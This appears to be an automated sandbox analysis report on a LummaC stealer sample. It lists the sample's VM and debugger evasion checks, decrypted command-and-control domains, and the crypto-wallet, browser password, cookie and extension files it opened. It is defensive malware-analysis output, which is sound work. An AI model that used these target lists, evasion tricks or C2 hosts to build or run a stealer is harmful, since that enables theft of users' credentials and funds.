Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Window / User API: threadDelayed 391			Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Window / User API: threadDelayed 9595			Jump to behavior

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-64247

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

API coverage: 5.1 %

Source: C:\Users\user\Desktop\TUp6f2knn2.exe TID: 7444	Thread sleep count: 391 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe TID: 7444	Thread sleep time: -282302s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe TID: 7444	Thread sleep count: 9595 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TUp6f2knn2.exe TID: 7444	Thread sleep time: -6927590s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe TID: 7488	Thread sleep time: -150000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Last function: Thread delayed

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: B4A1.tmp.exe, 00000001.00000002.2189574857.0000000000996000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000003.1815832808.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000002.2189574857.00000000009CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: TUp6f2knn2.exe, 00000000.00000003.4001062036.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, TUp6f2knn2.exe, 00000000.00000002.4130607671.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd>
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: B4A1.tmp.exe, 00000001.00000003.1815832808.00000000009CD000.00000004.00000020.00020000.00000000.sdmp, B4A1.tmp.exe, 00000001.00000002.2189574857.00000000009CD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPKDPKDPKD
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

API call chain: ExitProcess graph end node

graph_1-25919

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Code function: 1_2_0043C1F0 LdrInitializeThunk,

1_2_0043C1F0

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00B4AD0B push dword ptr fs:[00000030h]	0_2_00B4AD0B
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_025600C6 mov eax, dword ptr fs:[00000030h]	0_2_025600C6
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0253092B mov eax, dword ptr fs:[00000030h]	0_2_0253092B
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_02530D90 mov eax, dword ptr fs:[00000030h]	0_2_02530D90
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_0095A90B push dword ptr fs:[00000030h]	1_2_0095A90B
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B092B mov eax, dword ptr fs:[00000030h]	1_2_024B092B
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	Code function: 1_2_024B0D90 mov eax, dword ptr fs:[00000030h]	1_2_024B0D90

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0255A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0255A63A
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0254073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0254073A
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_0253FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0253FB78
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: 0_2_025408CD SetUnhandledExceptionFilter,	0_2_025408CD

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: B4A1.tmp.exe	String found in binary or memory: rapeflowwj.lat
Source: B4A1.tmp.exe	String found in binary or memory: crosshuaht.lat
Source: B4A1.tmp.exe	String found in binary or memory: sustainskelet.lat
Source: B4A1.tmp.exe	String found in binary or memory: aspecteirs.lat
Source: B4A1.tmp.exe	String found in binary or memory: energyaffai.lat
Source: B4A1.tmp.exe	String found in binary or memory: necklacebudi.lat
Source: B4A1.tmp.exe	String found in binary or memory: discokeyus.lat
Source: B4A1.tmp.exe	String found in binary or memory: grannyejh.lat

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Process created: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe "C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0256B271
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: EnumSystemLocalesW,	0_2_02565034
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetLocaleInfoW,	0_2_02565427
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: EnumSystemLocalesW,	0_2_0256B4E9
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: EnumSystemLocalesW,	0_2_0256B534
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: EnumSystemLocalesW,	0_2_0256B5CF
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetLocaleInfoW,	0_2_0256BADC
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0256BBA9
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetLocaleInfoW,	0_2_0256B8AC
Source: C:\Users\user\Desktop\TUp6f2knn2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0256B9D5

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\Desktop\TUp6f2knn2.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: B4A1.tmp.exe PID: 7460, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: B4A1.tmp.exe, 00000001.00000002.2189574857.00000000009CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: B4A1.tmp.exe, 00000001.00000002.2190349192.00000000031F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: llets/ElectronCash)w
Source: B4A1.tmp.exe, 00000001.00000002.2189574857.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: B4A1.tmp.exe, 00000001.00000002.2189574857.00000000009CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: B4A1.tmp.exe, 00000001.00000002.2189574857.00000000009CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: B4A1.tmp.exe, 00000001.00000002.2189574857.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: B4A1.tmp.exe, 00000001.00000002.2189574857.00000000009CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: B4A1.tmp.exe, 00000001.00000002.2189574857.00000000009CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: B4A1.tmp.exe, 00000001.00000002.2189574857.00000000009BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B4A1.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
